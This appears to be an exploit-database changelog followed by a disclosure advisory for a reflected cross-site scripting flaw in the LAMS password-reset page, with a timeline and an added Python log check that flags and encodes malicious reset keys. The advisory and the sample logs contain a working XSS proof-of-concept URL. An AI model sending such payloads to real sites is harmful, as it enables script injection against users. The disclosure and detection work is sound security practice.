
9 changes to exploits/shellcodes

mySCADA myPRO 7 - Hard-Coded Credentials
Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload
Open-AudIT Community 2.2.6 - Cross-Site Scripting
Subrion CMS 4.2.1 - Cross-Site Scripting
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
CMS ISWEB 3.5.3 - Directory Traversal
Monstra 3.0.4 - Cross-Site Scripting
# Exploit Title: LAMS < 3.1 - Cross-Site Scripting
# Date: 2018-08-05
# Exploit Author: Nikola Kojic
# Website: https://ras-it.rs/
# Vendor Homepage: https://www.lamsfoundation.org/
# Software Link: https://www.lamsfoundation.org/downloads_home.htm
# Category: Web Application
# Platform: Java
# Version: <= 3.1
# CVE: 2018-12090

# Vendor Description:
# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative
# learning activities. It provides teachers with a highly intuitive visual authoring
# environment for creating sequences of learning activities.

# Technical Details and Exploitation:
# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows
# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET
# parameter during a forgotPasswordChange.jsp?key= password change.

# Proof of Concept:
http://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E

# Timeline:
# 2018-06-07: Discovered
# 2018-06-08: Vendor notified
# 2018-06-08: Vendor replies
# 2018-06-11: CVE number requested
# 2018-06-11: CVE number assigned
# 2018-06-15: Patch released
# 2018-08-05: Public disclosure
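
Added example (not part of the original advisory and not LAMS code): a log check that flags forgotPasswordChange.jsp requests whose decoded key parameter is not a plain token, plus the attribute encoding that renders such a value inert. The token format, the function names and the log lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate reset key is a short URL-safe token.
KEY_OK = re.compile(r"[A-Za-z0-9_-]{1,128}")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
TARGET = "/forgotPasswordChange.jsp"

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Aug/2018:10:00:01 +0000] '
    '"GET /lams/forgotPasswordChange.jsp?key=3f9c2a7e5b1d4c68 HTTP/1.1" 200 2311',
    '203.0.113.9 - - [05/Aug/2018:10:00:07 +0000] '
    '"GET /lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20'
    'onerror=alert(document.domain)%3E HTTP/1.1" 200 2380',
    '203.0.113.9 - - [05/Aug/2018:10:00:09 +0000] '
    '"GET /lams/index.jsp?key=%3Cb%3E HTTP/1.1" 200 512',
]


def suspicious_keys(lines):
    """Return (client_ip, decoded_key) for reset requests whose key is not a plain token."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(TARGET):
            continue
        # parse_qs percent-decodes values; keep_blank_values so an empty key= is seen.
        for key in parse_qs(url.query, keep_blank_values=True).get("key", []):
            if not KEY_OK.fullmatch(key):
                hits.append((line.split()[0], key))
    return hits


def attr_safe(value):
    """Encode a value for a double-quoted HTML attribute (server-side output encoding)."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for ip, key in suspicious_keys(SAMPLE_LOG):
        print(ip, repr(key), "->", attr_safe(key))
```
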